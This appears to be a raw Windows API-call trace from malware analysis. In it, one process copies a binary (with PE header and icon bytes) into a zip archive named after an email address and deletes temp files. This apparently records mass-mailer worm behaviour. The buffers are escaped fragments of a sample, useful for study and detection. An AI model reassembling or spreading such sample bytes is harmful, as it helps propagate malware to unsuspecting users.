\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => *\xf4\xff\xab\x0f1\x84\xf7\xbc\\xd1\x06z\xb8$g\xff\x17\xfa[\xf8\x1f\x8eIB\x07\x82\xec\xd1\x15`7:1\xc8\xe24D\xff\xff\xff\xff\x95y\x07Ib\x8b\xd4\x9b\xa9j\x89
\x82\xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => *\xf4\xff\xab\x0f1\x84\xf7\xbc\\xd1\x06z\xb8$g\xff\x17\xfa[\xf8\x1f\x8eIB\x07\x82\xec\xd1\x15`7:1\xc8\xe24D\xff\xff\xff\xff\x95y\x07Ib\x8b\xd4\x9b\xa9j\x89
\x82\xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => DYl\x83Y\xa7\xa9\xdb1\xb0%'\xcd&\x85\xd1\x16\xe17(\xf0\xbf\xbf\xed\xd1\xbc\xfcQ\xcd\x17\xe9\x83\xc6\xad\xcb@\xbf\xf0\xff\xff\xc5\x9d\x9f\x11\x8b\x00\xa9\x84\xc9@3\xabD2Zy)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => DYl\x83Y\xa7\xa9\xdb1\xb0%'\xcd&\x85\xd1\x16\xe17(\xf0\xbf\xbf\xed\xd1\xbc\xfcQ\xcd\x17\xe9\x83\xc6\xad\xcb@\xbf\xf0\xff\xff\xc5\x9d\x9f\x11\x8b\x00\xa9\x84\xc9@3\xabD2Zy)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => JK\x18\x19\xeb\x1d\xb3\x9e\xed[\x11 \xf6\x1d\x9e{\xdf\xe2\x17\xf8D#\x19\xaaN
_\x10\xbeyf\xe9\x91\xb6\x99Z7\xfa[\xff\x81B\x1f\x18\xf9 \xeeJO\xb5|\xc7\xd1+}\x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => JK\x18\x19\xeb\x1d\xb3\x9e\xed[\x11 \xf6\x1d\x9e{\xdf\xe2\x17\xf8D#\x19\xaaN
_\x10\xbeyf\xe9\x91\xb6\x99Z7\xfa[\xff\x81B\x1f\x18\xf9 \xeeJO\xb5|\xc7\xd1+}\x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \xf5\xd288.
@C"O\xb3\xe5\x18eCQ\xff/\xfd\x06\xc7A'\x80\x8f\x8f\xcdZErF\x19v\x1a\xb7\x11M{\xa5\xfe\xff\xffiQF\x11\xcfdZGB-n\x18Va\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \xf5\xd288.
@C"O\xb3\xe5\x18eCQ\xff/\xfd\x06\xc7A'\x80\x8f\x8f\xcdZErF\x19v\x1a\xb7\x11M{\xa5\xfe\xff\xffiQF\x11\xcfdZGB-n\x18Va\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \x0e\x80V[\xbd\x00\x1avue\x0f\x8b\xcc\xdc\xa5\x84\x11)um0\x0cO\xb3\xcd&\xb7?d\xc2\xf8m\xa0\xa2an\x87se0\x8a7\x17k\x8cr\x10\xf6\x07isd\xbd\xf6\ z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b` FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \x0e\x80V[\xbd\x00\x1avue\x0f\x8b\xcc\xdc\xa5\x84\x11)um0\x0cO\xb3\xcd&\xb7?d\xc2\xf8m\xa0\xa2an\x87se0\x8a7\x17k\x8cr\x10\xf6\x07isd\xbd\xf6\ z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b` FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \x00\x00\x00 \x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \x00\x00\x00 \x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x88 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x88 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => 1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83\xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3vPK\x01\x02\x14\x00
\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => 1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83\xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3vPK\x01\x02\x14\x00
\x00\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => FileHandle => 0x00000188 |
FAILURE | 3221225489 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => PK\x01\x02\x14\x00
\x00\x00\x00\x00\x00\x81\x95\xde0\x90YBOTq\x00\x00Tq\x00\x00\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => premium-server@thawte.com.zip FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00K\x00\x00\x00\x8fq\x00\x00\x00\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,819 | 364 | DeleteFileA |
FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp2.tmp |
SUCCESS | 0x00000001 | |
| 07:44:02,829 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp3.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtQueryInformationFile |
FileHandle => 0x00000188 FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00\xf0q\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp3.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\x81\x95\xde0\x90YBOTq\x00\x00Tq\x00\x00\x1d\x00\x00\x00premium-server@thawte.com.zipPK\x03\x04
